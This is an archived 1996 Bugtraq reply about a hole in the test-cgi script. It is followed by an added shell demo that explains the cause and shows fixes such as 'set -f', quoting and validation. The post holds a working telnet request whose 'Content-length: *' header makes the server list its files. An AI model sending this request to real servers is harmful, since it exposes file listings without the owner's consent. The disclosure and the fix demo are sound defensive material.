Bugtraq archives for 4th quarter (Oct-Dec) 1996: Re: Vulnerability in test-cgi

Re: Vulnerability in test-cgi

Evgene Ilyine (esiptc.spbu.ru)
Tue, 17 Dec 1996 12:24:32 +0300

On Tue, 3 Dec 1996, Joe Zbiciak wrote:

> string.  Therefore it's still vulnerable in its default configuration.
> Adding "set -f" as the second line of the script closes the hole completely.

  Yes -- otherwise this hole would look like a virus; here is another
mutation:

<esisnark:~> (268) telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
post /cgi-bin/nph-test-cgi http/1.0
Content-type: x
Content-length: *

.. skipped
CONTENT_LENGTH = ( here you'll get a list of files)

=============================================================
postmasterspbu.ru                              Evgene Ilyine
http://www.ptc.spbu.ru/~esi               Work phone:428-4527
=============================================================
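
Added example, not part of the original post and not the test-cgi source: a sketch of why a header value of `*` comes back as a file list, and how the "set -f" fix from the quoted reply changes that. The echo line is modeled on the output shown in the session; the function names, the sandbox helper and the two sample files are assumptions constructed for the demo.

```shell
#!/bin/sh
# Constructed demo: a CGI-style script echoing a request header value that
# the server placed in the CONTENT_LENGTH environment variable.

# Vulnerable form: unquoted expansion, so the shell performs pathname
# expansion on the attacker-supplied value.
report_unquoted() {
    echo CONTENT_LENGTH = $CONTENT_LENGTH
}

# Fix from the quoted reply: "set -f" disables pathname expansion.
# Runs in a subshell so the option does not leak into the caller.
report_noglob() (
    set -f
    echo CONTENT_LENGTH = $CONTENT_LENGTH
)

# Alternative hardening: quote the expansion (also stops word splitting).
report_quoted() {
    echo "CONTENT_LENGTH = $CONTENT_LENGTH"
}

# Stricter: accept only what a Content-length should be, a decimal number.
report_validated() {
    case $CONTENT_LENGTH in
        ''|*[!0-9]*) echo "CONTENT_LENGTH = (rejected: not a number)" ;;
        *)           echo "CONTENT_LENGTH = $CONTENT_LENGTH" ;;
    esac
}

# Run one of the functions above inside a throwaway directory holding two
# constructed files, with the header value from the session ("*").
in_sandbox() (
    dir=$(mktemp -d) || exit 1
    cd "$dir" || exit 1
    : > alpha.txt
    : > beta.conf
    CONTENT_LENGTH='*'
    "$@"
    status=$?
    cd / && rm -rf "$dir"
    exit "$status"
)

for f in report_unquoted report_noglob report_quoted report_validated; do
    printf '%-18s %s\n' "$f:" "$(in_sandbox "$f")"
done
```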